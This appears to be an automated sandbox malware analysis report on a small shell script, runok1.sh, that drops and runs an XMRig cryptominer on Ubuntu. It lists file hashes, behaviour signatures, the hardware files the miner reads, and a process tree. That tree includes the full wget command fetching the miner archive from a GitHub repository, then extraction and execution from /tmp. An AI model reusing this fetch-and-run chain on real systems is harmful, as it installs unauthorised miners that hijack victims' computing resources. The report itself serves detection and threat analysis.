Analysis
-
max time kernel
1799s -
max time network
1783s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system -
submitted
17-10-2024 04:13
Static task
static1
Behavioral task
behavioral1
Sample
runok1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
runok1.sh
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral3
Sample
runok1.sh
Resource
ubuntu2204-amd64-20240729-en
Behavioral task
behavioral4
Sample
runok1.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runok1.sh
-
Size
138B
-
MD5
ed44ae7cc01f7bcc21c98a523afabd7c
-
SHA1
4e7f50162eeb61715a948d3359639c6910088860
-
SHA256
1663e111eceb895f9be9e87c6cfda675e506cd8ec88d144fd1a2b5dc7081d0de
-
SHA512
e1c895b50b2b259d40501497ae4f9b2bb77b2d8713cd584d9c83cab82898f5e134ba6c8320810bf649867156494ea5b656143b71e269c9490da210d48a52982c
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Executes dropped EXE 1 IoCs
Processes:
xmrigioc pid Process /tmp/ok/xmrig 2851 xmrig -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Processes:
xmrigdescription ioc Process File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/product_name xmrig File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrig -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com 5 raw.githubusercontent.com -
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Processes:
xmrigdescription ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_version xmrig File opened for reading /sys/devices/virtual/dmi/id/board_name xmrig File opened for reading /sys/devices/virtual/dmi/id/board_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_version xmrig File opened for reading /sys/devices/virtual/dmi/id/product_version xmrig File opened for reading /sys/devices/virtual/dmi/id/product_uuid xmrig File opened for reading /sys/devices/virtual/dmi/id/board_version xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_date xmrig -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
xmrigdescription ioc Process File opened for reading /proc/cpuinfo xmrig -
Reads CPU attributes 1 TTPs 45 IoCs
Processes:
xmrigdescription ioc Process File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets xmrig File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq xmrig File opened for reading /sys/devices/system/cpu/possible xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/online xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size xmrig File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map xmrig File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus xmrig -
Enumerates kernel/hardware configuration 1 TTPs 24 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
xmrigdescription ioc Process File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency xmrig File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages xmrig File opened for reading /sys/devices/system/node/node0/hugepages xmrig File opened for reading /sys/devices/system/node/node0/access0/initiators xmrig File opened for reading /sys/firmware/dmi/tables/smbios_entry_point xmrig File opened for reading /sys/firmware/dmi/tables/DMI xmrig File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages xmrig File opened for reading /sys/fs/cgroup/cpuset.cpus.effective xmrig File opened for reading /sys/fs/cgroup/cpuset.mems.effective xmrig File opened for reading /sys/devices/system/cpu xmrig File opened for reading /sys/kernel/mm/hugepages xmrig File opened for reading /sys/devices/system/node/online xmrig File opened for reading /sys/bus/dax/devices xmrig File opened for reading /sys/devices/system/node/node0/access1/initiators xmrig File opened for reading /sys/fs/cgroup/cgroup.controllers xmrig File opened for reading /sys/devices/system/node/node0/meminfo xmrig File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages xmrig File opened for reading /sys/devices/virtual/dmi/id xmrig File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages xmrig File opened for reading /sys/devices/system/node/node0/cpumap xmrig -
Processes:
wgettarxmrigdescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled wget File opened for reading /proc/filesystems tar File opened for reading /proc/mounts xmrig File opened for reading /proc/self/cpuset xmrig File opened for reading /proc/meminfo xmrig File opened for reading /proc/driver/nvidia/gpus xmrig File opened for reading /proc/sys/vm/nr_hugepages xmrig -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgettarxmrigdescription ioc Process File opened for modification /tmp/ok.tar.gz wget File opened for modification /tmp/ok/SHA256SUMS tar File opened for modification /tmp/ok/config.json tar File opened for modification /tmp/ok/xmrig tar File opened for modification /tmp/ok/config.json xmrig
Processes
-
/tmp/runok1.sh/tmp/runok1.sh1⤵PID:2831
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/ok.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2838
-
-
/usr/bin/tartar xvf ok.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2848 -
/usr/local/sbin/gzipgzip -d3⤵PID:2849
-
-
/usr/local/bin/gzipgzip -d3⤵PID:2849
-
-
/usr/sbin/gzipgzip -d3⤵PID:2849
-
-
/usr/bin/gzipgzip -d3⤵PID:2849
-
-
-
/usr/bin/chmod2⤵PID:2850
-
-
/tmp/ok/xmrig2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:2851
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD5eb11bcc6daeefd699df5681f4fdd68ad
SHA15403567cca40931c61aa15c8e3186e98464feccd
SHA256ebf820a765ea02f4d8b5bb9219cac4c7219c0130c7acefa778b6c9ee3f81a98c
SHA5124011b3240f9f1743197971e9f923713f1f7a12fda9811a43351ab33a60880e071f38402a627f96f0483d3e5b66db34304c27a95164baad887a60932f6961464b
-
Filesize
2.9MB
MD57cfcd8684e6e5c13287c16e6c40c5efb
SHA13e9202eb800602aa947b7a48cabadb4bd9742b35
SHA2566c8df670c44f35e0015cd709b975e5e8a6616ca346b602d3ea4f3894ddf777ca
SHA512679a968ef46605ec78ad9b72b594b96ae28ca73ea99f892ed5c69b5f264d76e03db60caa13454cf7b7d28a99dffcb134b4ce3b25f00c37846999cbbae22c4b94
-
Filesize
150B
MD57fd26dcea92a3ad3561867c5735c8ecc
SHA1400fe1a03ef6d4520b88f0c63002266586cdaa0f
SHA256c2db0386506ea30d3b7c375ff40dfc875c2aa7961beb7806a36cf12fc10405b6
SHA512b114cee7f7da66afc53aca2013c63ed0d12740cca8ad46a5164789fe33f1889a2ec313186a29c4fc1dd30a11041db31bb307be1884e15680f4b7627143cbf6d8
-
Filesize
2KB
MD506a36033ace7787c6d0677950a5e9f7f
SHA1f052c6419d293febe45fd3d9a9be4808854f1a5b
SHA256ce35d1da303888ed10bd705dbb12c3319cc76fb5341df3ef08dd06a7953a3f4d
SHA51261a039548095de8cd7f7303175aadad78934548437a101c0dffbaf0346bf0504bcbcadaadd55b8d4df160b4bf6e482245973ccbe75857da149dc45d07f49c02b
-
Filesize
1KB
MD51879742a3f028a8e227f3b6b51756269
SHA120365c0cf35e787f525baede3646cfdfe6001cba
SHA2564042908287a7c60eb515d2c180a03d25156b4001af6cba1ad823461cc86751c5
SHA512e7d918532dd029a53b803df0df2e4e61416e18b58ffabe18b542cd30b111f266e98d73aad8ffe62a79af50e4f21d7e19415ee03ff104eb36aaad2cf1903e9731
-
Filesize
4.7MB
MD5785bf8ddbd3fa72fc5aeeefb97886654
SHA12ea77bc5863cb45127d453cf21edae00974fb522
SHA25605d6547fabba75ca11dad24d290b85415c0b39d2fbeffe3a2de68b2575991b2a
SHA51231b7a4e2e8a9ff97c91167c52cd2fb8d7db0d1cc5edc4dc0ff21e3baa81a4ca705da9319511c32043032454496fc05bd159824dcdfd00d7aa6b117877c6ee413